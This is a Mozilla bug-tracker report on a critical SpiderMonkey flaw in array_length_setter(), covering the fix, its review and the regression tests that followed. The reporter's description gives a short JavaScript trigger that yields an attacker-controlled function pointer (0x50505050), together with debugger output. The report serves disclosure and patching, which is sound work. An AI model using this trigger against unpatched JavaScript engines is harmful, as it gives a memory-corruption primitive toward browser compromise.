array_length_setter() is exploitable

VERIFIED FIXED in mozilla1.9alpha8

Status

()

P1
critical
VERIFIED FIXED
11 years ago
9 years ago

People

(Reporter: sync2d, Assigned: brendan)

Tracking

({crash, regression, testcase})

Trunk
mozilla1.9alpha8
crash, regression, testcase
Points:
---
Bug Flags:
blocking1.9 +
wanted1.8.1.x -
in-testsuite +

Firefox Tracking Flags

(Not tracked)

Details

(Whiteboard: [sg:critical] post 1.8-branch)

Attachments

(3 attachments, 2 obsolete attachments)

(Reporter)

Description

11 years ago
$ cat array-length.txt
function exploit() {
  var fun = function () {};
  fun.__proto__ = [];
  fun.length = 0x50505050 >> 1;
  fun();
}
exploit();

$ dbg.obj/js array-length.txt
Assertion failure: OBJ_GET_CLASS(cx, obj) == &js_ArrayClass, at jsarray.c:404

$ gdb --eval run --args opt.obj/js array-length.txt
...
Program received signal SIGSEGV, Segmentation fault.
js_Interpret (cx=0xaa0750, pc=0xaa3cfa ":", result=0x97ec84)
    at jsinterp.c:3925
3925                    if (fun->flags & JSFUN_INTERPRETED) {
(gdb) print fun
$1 = (JSFunction *) 0x50505050

Updated

11 years ago
Keywords: testcase
Whiteboard: [sg:critical]
(Assignee)

Comment 1

11 years ago
Created attachment 274976 [details] [diff] [review]
fix
Assignee: general → brendan
Status: NEW → ASSIGNED
Attachment #274976 - Flags: review?(igor)
(Assignee)

Updated

11 years ago
Priority: -- → P1
Target Milestone: --- → mozilla1.9 M8
(Assignee)

Comment 2

11 years ago
Created attachment 274978 [details] [diff] [review]
alterna-fix after discussion with Igor
Attachment #274976 - Attachment is obsolete: true
Attachment #274978 - Flags: review?(igor)
Attachment #274976 - Flags: review?(igor)

Updated

11 years ago
Attachment #274978 - Flags: review?(igor) → review+

Comment 3

11 years ago
Comment on attachment 274976 [details] [diff] [review]
fix

This is OK as a security fix.
Attachment #274976 - Flags: review+

Comment 4

11 years ago
(In reply to comment #3)
> (From update of attachment 274976 [details] [diff] [review])
> This is OK as a security fix.

The problem is that

function F() {} F.prototype = []; var x = new F(); x.length = 10; print(x.length);

now prints 0, not 10 as required by ECMA.
(Assignee)

Comment 5

11 years ago
(In reply to comment #4)
> (In reply to comment #3)
> > (From update of attachment 274976 [details] [diff] [review] [details])
> > This is OK as a security fix.
> 
> The problem is that
> 
> function F() {} F.prototype = []; var x = new F(); x.length = 10;
> print(x.length);
> 
> now prints 0, not 10 as required by ECMA.

I thought this was an old bug, but I was wrong:

$ ../src.ref/Darwin_DBG.OBJ/js
js> function F() {} F.prototype = []; var x = new F(); x.length = 10;
10
js> x.length
10

Recent regression, due to bug 385393 of course. Let me try to fix it and fix this bug.

/be
(Assignee)

Comment 6

11 years ago
(My ../src.ref/ tree pre-dates last night's landings.)

/be
(Assignee)

Comment 7

11 years ago
Created attachment 274983 [details] [diff] [review]
alterna-fix 2, restores lost ECMA compat
Attachment #274978 - Attachment is obsolete: true
Attachment #274983 - Flags: review?(igor)

Comment 8

11 years ago
Comment on attachment 274983 [details] [diff] [review]
alterna-fix 2, restores lost ECMA compat

This is simple and nice workaround.
Attachment #274983 - Flags: review?(igor) → review+
(Assignee)

Updated

11 years ago
Flags: blocking1.9+
(Assignee)

Comment 9

11 years ago
Fixed:

js/src/jsarray.c 3.116

/be
Status: ASSIGNED → RESOLVED
Last Resolved: 11 years ago
Resolution: --- → FIXED

Comment 10

11 years ago
Created attachment 275372 [details]
js1_5/extensions/regress-390598.js

Comment 11

11 years ago
Created attachment 275373 [details]
ecma_3/Array/regress-390598.js

Updated

11 years ago
Flags: in-testsuite+

Comment 12

11 years ago
verified fixed 1.9.0 linux/mac*/windows.
Status: RESOLVED → VERIFIED
Group: core-security
Flags: wanted1.8.1.x-
Keywords: regression
Whiteboard: [sg:critical] → [sg:critical] post 1.8-branch

Comment 13

9 years ago
test checked into 1.9.0, 1.9.1, 1.9.2, tracemonkey. 1.9.3 will get picked up in the next merge.
You need to log in before you can comment on or make changes to this bug.